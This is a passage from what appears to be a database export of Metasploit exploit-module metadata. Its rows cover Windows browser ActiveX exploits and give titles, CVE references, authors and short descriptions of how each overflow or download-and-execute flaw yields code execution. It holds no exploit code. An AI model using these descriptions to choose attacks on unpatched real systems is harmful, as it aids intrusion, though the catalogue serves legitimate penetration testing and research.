OSVDB-66636, URL-http://secunia.com/advisories/40729/, URL-http://support.apple.com/kb/HT4290","Krystian Kloskowski, jduck " 376,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb","exploit","windows/browser/apple_quicktime_texml_font_table","exploit/windows/browser/apple_quicktime_texml_font_table","Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow",300,"This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).","Metasploit Framework License (BSD)","f","2012-11-07 00:00:00",0,,"passive","t","BID-56557, CVE-2012-3752, OSVDB-87087, URL-http://support.apple.com/kb/HT5581","Arezou Hosseinzad-Amirkhizi, juan vazquez " 377,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ask_shortformat.rb","exploit","windows/browser/ask_shortformat","exploit/windows/browser/ask_shortformat","Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53. An attacker may be able to excute arbitrary code by sending an overly long string to the ""ShortFormat()"" method in askbar.dll.","Metasploit Framework License (BSD)","f","2007-09-24 00:00:00",0,,"passive","t","CVE-2007-5107, OSVDB-37735, URL-http://wslabi.com/wabisabilabi/showBidInfo.do?code=ZD-00000148","MC " 378,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb","exploit","windows/browser/asus_net4switch_ipswcom","exploit/windows/browser/asus_net4switch_ipswcom","ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow",300,"This module exploits a vulnerability found in ASUS Net4Switch's ipswcom.dll ActiveX control. A buffer overflow condition is possible in multiple places due to the use of the CxDbgPrint() function, which allows remote attackers to gain arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-02-17 00:00:00",0,,"passive","t","CVE-2012-4924 , OSVDB-79438, URL-http://dsecrg.com/pages/vul/show.php?id=417","Dmitriy Evdokimov, sinn3r " 379,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/athocgov_completeinstallation.rb","exploit","windows/browser/athocgov_completeinstallation","exploit/windows/browser/athocgov_completeinstallation","AtHocGov IWSAlerts ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in AtHocGov IWSAlerts. When sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll (6.1.4.36) an attacker may be able to execute arbitrary code. This vulnerability was silently patched by the vendor.","Metasploit Framework License (BSD)","f","2008-02-15 00:00:00",0,,"passive","t","URL-http://www.athoc.com/products/IWSAlerts_overview.aspx","MC " 380,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/autodesk_idrop.rb","exploit","windows/browser/autodesk_idrop","exploit/windows/browser/autodesk_idrop","Autodesk IDrop ActiveX Control Heap Memory Corruption",300,"This module exploits a heap-based memory corruption vulnerability in Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. An attacker can execute arbitrary code by triggering a heap use after free condition using the Src, Background, PackageXml properties.","Metasploit Framework License (BSD)","f","2009-04-02 00:00:00",0,,"passive","t","BID-34352, EDB-8560, OSVDB-53265, URL-http://marc.info/?l=full-disclosure&m=123870112214736","Elazar Broad , Trancer " 381,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/aventail_epi_activex.rb","exploit","windows/browser/aventail_epi_activex","exploit/windows/browser/aventail_epi_activex","SonicWALL Aventail epi.dll AuthCredential Format String",300,"This module exploits a format string vulnerability within version 10.0.4.x and 10.5.1 of the SonicWALL Aventail SSL-VPN Endpoint Interrogator/Installer ActiveX control (epi.dll). By calling the 'AuthCredential' method with a specially crafted Unicode format string, an attacker can cause memory corruption and execute arbitrary code. Unfortunately, it does not appear to be possible to indirectly re-use existing stack data for more reliable exploitation. This is due to several particulars about this vulnerability. First, the format string must be a Unicode string, which uses two bytes per character. Second, the buffer is allocated on the stack using the 'alloca' function. As such, each additional format specifier (%x) will add four more bytes to the size allocated. This results in the inability to move the read pointer outside of the buffer. Further testing showed that using specifiers that pop more than four bytes does not help. Any number of format specifiers will result in accessing the same value within the buffer. NOTE: It may be possible to leverage the vulnerability to leak memory contents. However, that has not been fully investigated at this time.","Metasploit Framework License (BSD)","f","2010-08-19 00:00:00",0,,"passive","t","OSVDB-67286, URL-http://sotiriu.de/adv/NSOADV-2010-005.txt","Nikolas Sotiriu, jduck " 382,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/awingsoft_web3d_bof.rb","exploit","windows/browser/awingsoft_web3d_bof","exploit/windows/browser/awingsoft_web3d_bof","AwingSoft Winds3D Player SceneURL Buffer Overflow",200,"This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-07-10 00:00:00",0,,"passive","t","CVE-2009-4588, EDB-9116, OSVDB-60017, URL-http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/, URL-http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt","Trancer , jduck , shinnai " 383,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb","exploit","windows/browser/awingsoft_winds3d_sceneurl","exploit/windows/browser/awingsoft_winds3d_sceneurl","AwingSoft Winds3D Player 3.5 SceneURL Download and Execute",600,"This module exploits an untrusted program execution vulnerability within the Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL' parameter to the URL to an executable, an attacker can execute arbitrary code. Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and IE 8 on Windows XP SP3.","Metasploit Framework License (BSD)","f","2009-11-14 00:00:00",0,,"passive","t","CVE-2009-4850, OSVDB-60049","jduck " 384,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb","exploit","windows/browser/baofeng_storm_onbeforevideodownload","exploit/windows/browser/baofeng_storm_onbeforevideodownload","BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",300,"This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX control. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing an overly long string to the method ""OnBeforeVideoDownload"" an attacker can execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-04-30 00:00:00",0,,"passive","t","BID-34789, CVE-2009-1612, EDB-8579, OSVDB-54169","jduck " 385,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/barcode_ax49.rb","exploit","windows/browser/barcode_ax49","exploit/windows/browser/barcode_ax49","RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow",300,"This module exploits a stack buffer overflow in RKD Software Barcode Application ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-06-22 00:00:00",0,,"passive","t","BID-24596, CVE-2007-3435, EDB-4094, OSVDB-37482","Trancek , patrick " 386,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb","exploit","windows/browser/blackice_downloadimagefileurl","exploit/windows/browser/blackice_downloadimagefileurl","Black Ice Cover Page ActiveX Control Arbitrary File Download",600,"This module allows remote attackers to place arbitrary files on a users file system by abusing the ""DownloadImageFileURL"" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0). Code exeuction can be acheived by first uploading the payload to the remote machine, and then upload another mof file, which enables Windows Management Instrumentation service to execute the binary. Please note that this module currently only works for Windows before Vista. Also, a similar issue is reported in BIDIB.ocx (10.9.3.0) within the Barcode SDK.","Metasploit Framework License (BSD)","f","2008-06-05 00:00:00",0,,"passive","t","BID-29577, CVE-2008-2683, EDB-5750, OSVDB-46007","mr_me , shinnai, sinn3r " 387,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb","exploit","windows/browser/c6_messenger_downloaderactivex","exploit/windows/browser/c6_messenger_downloaderactivex","Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",600,"This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The insecure control can be abused to download and execute arbitrary files in the context of the currently logged-on user.","Metasploit Framework License (BSD)","f","2008-06-03 00:00:00",0,,"passive","t","BID-29519, CVE-2008-2551, OSVDB-45960, URL-http://retrogod.altervista.org/9sg_c6_download_exec.html","Nine:Situations:Group::SnoopyAssault, juan vazquez " 388,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb","exploit","windows/browser/ca_brightstor_addcolumn","exploit/windows/browser/ca_brightstor_addcolumn","CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow",300,"The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker could overflow a buffer and execute arbitrary code on the system.","Metasploit Framework License (BSD)","f","2008-03-16 00:00:00",0,,"passive","t","CVE-2008-1472, OSVDB-43214","dean " 389,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/chilkat_crypt_writefile.rb","exploit","windows/browser/chilkat_crypt_writefile","exploit/windows/browser/chilkat_crypt_writefile","Chilkat Crypt ActiveX WriteFile Unsafe Method",600,"This module allows attackers to execute code via the 'WriteFile' unsafe method of Chilkat Software Inc's Crypt ActiveX control. This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to execute our payload immediately. However, this method requires that the victim user be browsing with Administrator. Additionally, this method will not work on newer versions of Windows. NOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at the time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.","Metasploit Framework License (BSD)","f","2008-11-03 00:00:00",0,,"passive","t","BID-32073, CVE-2008-5002, EDB-6963, OSVDB-49510","jduck , shinnai" 390,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/cisco_anyconnect_exec.rb","exploit","windows/browser/cisco_anyconnect_exec","exploit/windows/browser/cisco_anyconnect_exec","Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",600,"This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the 'url' property which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified within the 'url' property. One of these files it will be stored in a temporary directory and executed.","Metasploit Framework License (BSD)","f","2011-06-01 00:00:00",0,,"passive","t","CVE-2011-2039, OSVDB-72714, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909, URL-http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml","bannedit " 391,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/cisco_playerpt_setsource.rb","exploit","windows/browser/cisco_playerpt_setsource","exploit/windows/browser/cisco_playerpt_setsource","Cisco Linksys PlayerPT ActiveX Control Buffer Overflow",300,"This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15 as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in the SetSource method, allows to trigger a stack based buffer overflow which leads to code execution under the context of the user visiting a malicious web page.","Metasploit Framework License (BSD)","f","2012-03-22 00:00:00",0,,"passive","t","EDB-18641, OSVDB-80297","juan vazquez , rgod" 392,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb","exploit","windows/browser/cisco_playerpt_setsource_surl","exploit/windows/browser/cisco_playerpt_setsource_surl","Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",300,"This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15 as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in the SetSource method, when handling a specially crafted sURL argument, allows to trigger a stack based buffer overflow which leads to code execution under the context of the user visiting a malicious web page.","Metasploit Framework License (BSD)","f","2012-07-17 00:00:00",0,,"passive","t","BID-54588, CVE-2012-0284, OSVDB-84309, URL-http://secunia.com/secunia_research/2012-25/","Carsten Eiram, juan vazquez " 393,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/citrix_gateway_actx.rb","exploit","windows/browser/citrix_gateway_actx","exploit/windows/browser/citrix_gateway_actx","Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability",300,"This module exploits a stack based buffer overflow in the Citrix Gateway ActiveX control. Exploitation of this vulnerability requires user interaction. The victim must click a button in a dialog to begin a scan. This is typical interaction that users should be accustom to. Exploitation results in code execution with the privileges of the user who browsed to the exploit page.","Metasploit Framework License (BSD)","f","2011-07-14 00:00:00",0,,"passive","t","CVE-2011-2882, OSVDB-74191, URL-https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=929","Michal Trojnara, bannedit , sinn3r " 394,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/clear_quest_cqole.rb","exploit","windows/browser/clear_quest_cqole","exploit/windows/browser/clear_quest_cqole","IBM Rational ClearQuest CQOle Remote Code Execution",300,"This module exploits a function prototype mismatch on the CQOle ActiveX control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which allows reliable remote code execution when DEP isn't enabled.","Metasploit Framework License (BSD)","f","2012-05-19 00:00:00",0,,"passive","t","BID-53170, CVE-2012-0708, OSVDB-81443, URL-http://www-304.ibm.com/support/docview.wss?uid=swg21591705, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-113/, URL-https://community.rapid7.com/community/metasploit/blog/2012/07/11/it-isnt-always-about-buffer-overflow","Andrea Micalizzi aka rgod, juan vazquez " 395,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/communicrypt_mail_activex.rb","exploit","windows/browser/communicrypt_mail_activex","exploit/windows/browser/communicrypt_mail_activex","CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll ActiveX Control provided by CommuniCrypt Mail 1.16. By sending a overly long string to the ""AddAttachments()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-05-19 00:00:00",0,,"passive","t","EDB-12663, OSVDB-64839","Lincoln, dookie" 396,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/creative_software_cachefolder.rb","exploit","windows/browser/creative_software_cachefolder","exploit/windows/browser/creative_software_cachefolder","Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When sending an overly long string to the cachefolder() property of CTSUEng.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-05-28 00:00:00",0,,"passive","t","CVE-2008-0955, OSVDB-45655","MC " 397,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/crystal_reports_printcontrol.rb","exploit","windows/browser/crystal_reports_printcontrol","exploit/windows/browser/crystal_reports_printcontrol","Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",300,"This module exploits a heap based buffer overflow in the CrystalPrintControl ActiveX, while handling the ServerResourceVersion property. The affected control can be found in the PrintControl.dll component as included with Crystal Reports 2008. This module has been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7 SP1. The module uses the msvcr71.dll library, loaded by the affected ActiveX control, to bypass DEP and ASLR.","Metasploit Framework License (BSD)","f","2010-12-14 00:00:00",0,,"passive","t","BID-45387, CVE-2010-2590, EDB-15733, OSVDB-69917","Dmitriy Pletnev, Dr_IDE, juan vazquez " 398,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/dell_webcam_crazytalk.rb","exploit","windows/browser/dell_webcam_crazytalk","exploit/windows/browser/dell_webcam_crazytalk","Dell Webcam CrazyTalk ActiveX BackImage Vulnerability",300,"This module exploits a vulnerability in Dell Webcam's CrazyTalk component. Specifically, when supplying a long string for a file path to the BackImage property, an overflow may occur after checking certain file extension names, resulting in remote code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-03-19 00:00:00",0,,"passive","t","EDB-18621, OSVDB-80205, URL-http://www.dell.com/support/drivers/us/en/04/DriverDetails/DriverFileFormats?c=us&l=en&s=bsd&cs=04&DriverId=R230103","rgod, sinn3r " 399,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/dxstudio_player_exec.rb","exploit","windows/browser/dxstudio_player_exec","exploit/windows/browser/dxstudio_player_exec","Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution",600,"This module exploits a command execution vulnerability within the DX Studio Player from Worldweaver. The player is a browser plugin for IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web page referring to a specially crafted .dxstudio document, an attacker can execute arbitrary commands. Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow the plug-in to access local files. This prompt appears to occur only once per server host. NOTE: This exploit uses additionally dangerous script features to write to local files!","Metasploit Framework License (BSD)","f","2009-06-09 00:00:00",0,,"passive","t","BID-35273, CVE-2009-2011, EDB-8922, OSVDB-54969, URL-http://dxstudio.com/guide.aspx","jduck " 400,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ea_checkrequirements.rb","exploit","windows/browser/ea_checkrequirements","exploit/windows/browser/ea_checkrequirements","Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-10-08 00:00:00",0,,"passive","t","CVE-2007-4466, OSVDB-37723","MC " 401,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb","exploit","windows/browser/ebook_flipviewer_fviewerloading","exploit/windows/browser/ebook_flipviewer_fviewerloading","FlipViewer FViewerLoading ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0. The vulnerability is caused due to a boundary error in the FViewerLoading (FlipViewerX.dll) ActiveX control when handling the ""LoadOpf()"" method.","BSD License","f","2007-06-06 00:00:00",0,,"passive","t","BID-24328, CVE-2007-2919, OSVDB-37042","LSO " 402,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/enjoysapgui_comp_download.rb","exploit","windows/browser/enjoysapgui_comp_download","exploit/windows/browser/enjoysapgui_comp_download","EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",600,"This module allows remote attackers to place arbitrary files on a users file system by abusing the ""Comp_Download"" method in the SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41).","Metasploit Framework License (BSD)","f","2009-04-15 00:00:00",0,,"passive","t","CVE-2008-4830, OSVDB-53680, URL-http://dsecrg.com/files/pub/pdf/HITB%20-%20Attacking%20SAP%20Users%20with%20Sapsploit.pdf","MC " 403,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb","exploit","windows/browser/enjoysapgui_preparetoposthtml","exploit/windows/browser/enjoysapgui_preparetoposthtml","EnjoySAP SAP GUI ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending an overly long string to the ""PrepareToPostHTML()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-07-05 00:00:00",0,,"passive","t","BID-24772, CVE-2007-3605, OSVDB-37690","MC " 404,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/facebook_extractiptc.rb","exploit","windows/browser/facebook_extractiptc","exploit/windows/browser/facebook_extractiptc","Facebook Photo Uploader 4 ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Facebook Photo Uploader 4. By sending an overly long string to the ""ExtractIptc()"" property located in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-01-31 00:00:00",0,,"passive","t","BID-27534, CVE-2008-5711, EDB-5049, OSVDB-41073","MC " 405,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb","exploit","windows/browser/foxit_reader_plugin_url_bof","exploit/windows/browser/foxit_reader_plugin_url_bof","Foxit Reader Plugin URL Processing Buffer Overflow",300,"This module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).","Metasploit Framework License (BSD)","f","2013-01-07 00:00:00",0,,"passive","t","BID-57174, EDB-23944, OSVDB-89030, URL-http://retrogod.altervista.org/9sg_foxit_overflow.htm, URL-http://secunia.com/advisories/51733/","Sven Krewitt , juan vazquez , rgod " 406,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/gom_openurl.rb","exploit","windows/browser/gom_openurl","exploit/windows/browser/gom_openurl","GOM Player ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in GOM Player 2.1.6.3499. By sending an overly long string to the ""OpenUrl()"" method located in the GomWeb3.dll Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-10-27 00:00:00",0,,"passive","t","CVE-2007-5779, OSVDB-38282, URL-http://secunia.com/advisories/27418/","MC " 407,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/greendam_url.rb","exploit","windows/browser/greendam_url","exploit/windows/browser/greendam_url","Green Dam URL Processing Buffer Overflow",300,"This module exploits a stack-based buffer overflow in Green Dam Youth Escort version 3.17 in the way it handles overly long URLs. By setting an overly long URL, an attacker can overrun a buffer and execute arbitrary code. This module uses the .NET DLL memory technique by Alexander Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.","Metasploit Framework License (BSD)","f","2009-06-11 00:00:00",0,,"passive","t","EDB-8938, OSVDB-55126, URL-http://taossa.com/archive/bh08sotirovdowd.pdf, URL-http://www.cse.umich.edu/~jhalderm/pub/gd/","Trancer " 408,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb","exploit","windows/browser/honeywell_hscremotedeploy_exec","exploit/windows/browser/honeywell_hscremotedeploy_exec","Honeywell HSC Remote Deployer ActiveX Remote Code Execution",600,"This modules exploits a vulnerability found in the Honewell HSC Remote Deployer ActiveX. This control can be abused by using the LaunchInstaller() function to execute an arbitrary HTA from a remote location. This module has been tested successfully with the HSC Remote Deployer ActiveX installed with HoneyWell EBI R410.1.","Metasploit Framework License (BSD)","f","2013-02-22 00:00:00",0,,"passive","t","BID-58134, CVE-2013-0108, OSVDB-90583, URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf, URL-https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi","juan vazquez " 409,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/honeywell_tema_exec.rb","exploit","windows/browser/honeywell_tema_exec","exploit/windows/browser/honeywell_tema_exec","Honeywell Tema Remote Installer ActiveX Remote Code Execution",600,"This modules exploits a vulnerability found in the Honewell Tema ActiveX Remote Installer. This ActiveX control can be abused by using the DownloadFromURL() function to install an arbitrary MSI from a remote location without checking source authenticity or user notification. This module has been tested successfully with the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and Internet Explorer 6, 7 and 8 on Windows XP SP3.","Metasploit Framework License (BSD)","f","2011-10-20 00:00:00",0,,"passive","t","BID-50078, OSVDB-76681, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-285-01.pdf","Billy Rios, Terry McCorkle, juan vazquez " 410,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb","exploit","windows/browser/hp_alm_xgo_setshapenodetype_exec","exploit/windows/browser/hp_alm_xgo_setshapenodetype_exec","HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",300,"This module exploits a vulnerability within the XGO.ocx ActiveX Control installed with the HP Application Lifecycle Manager Client. The vulnerability exists in the SetShapeNodeType method, which allows the user to specify memory that will be used as an object, through the node parameter. It allows to control the dereference and use of a function pointer. This module has been successfully tested with HP Application Lifecycle Manager 11.50 and requires JRE 6 in order to bypass DEP and ASLR.","Metasploit Framework License (BSD)","f","2012-08-29 00:00:00",0,,"passive","t","BID-55272, OSVDB-85152, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-170/","juan vazquez , rgod " 411,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb","exploit","windows/browser/hp_easy_printer_care_xmlcachemgr","exploit/windows/browser/hp_easy_printer_care_xmlcachemgr","HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",500,"This module allows remote attackers to place arbitrary files on a users file system by abusing the ""CacheDocumentXMLWithId"" method from the ""XMLCacheMgr"" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll 2.7.2.0). Code execution can be achieved by first uploading the payload to the remote machine embeddeding a vbs file, and then upload another mof file, which enables Windows Management Instrumentation service to execute the vbs. Please note that this module currently only works for Windows before Vista.","Metasploit Framework License (BSD)","f","2012-01-11 00:00:00",0,,"passive","t","BID-51396, CVE-2011-4786, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-013/","Andrea Micalizzi, juan vazquez " 412,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb","exploit","windows/browser/hp_easy_printer_care_xmlsimpleaccessor","exploit/windows/browser/hp_easy_printer_care_xmlsimpleaccessor","HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution",500,"This module allows remote attackers to place arbitrary files on a users file system by abusing via Directory Traversal attack the ""saveXML"" method from the ""XMLSimpleAccessor"" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll 2.7.2.0). Code execution can be achieved by first uploading the payload to the remote machine embeddeding a vbs file, and then upload another mof file, which enables Windows Management Instrumentation service to execute the vbs. Please note that this module currently only works for Windows before Vista.","Metasploit Framework License (BSD)","f","2011-08-16 00:00:00",0,,"passive","t","BID-49100, CVE-2011-2404, OSVDB-74510, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-261/","Andrea Micalizzi, juan vazquez " 413,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hp_loadrunner_addfile.rb","exploit","windows/browser/hp_loadrunner_addfile","exploit/windows/browser/hp_loadrunner_addfile","Persits XUpload ActiveX AddFile Buffer Overflow",300,"This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5. By passing an overly long string to the AddFile method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-01-25 00:00:00",0,,"passive","t","BID-27456, CVE-2008-0492, EDB-4987, OSVDB-40762, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html","jduck " 414,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb","exploit","windows/browser/hp_loadrunner_addfolder","exploit/windows/browser/hp_loadrunner_addfolder","HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow",400,"This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0. By passing an overly long string to the AddFolder method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-12-25 00:00:00",0,,"passive","t","BID-27025, CVE-2007-6530, OSVDB-39901, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html","MC " 415,"2013-05-07 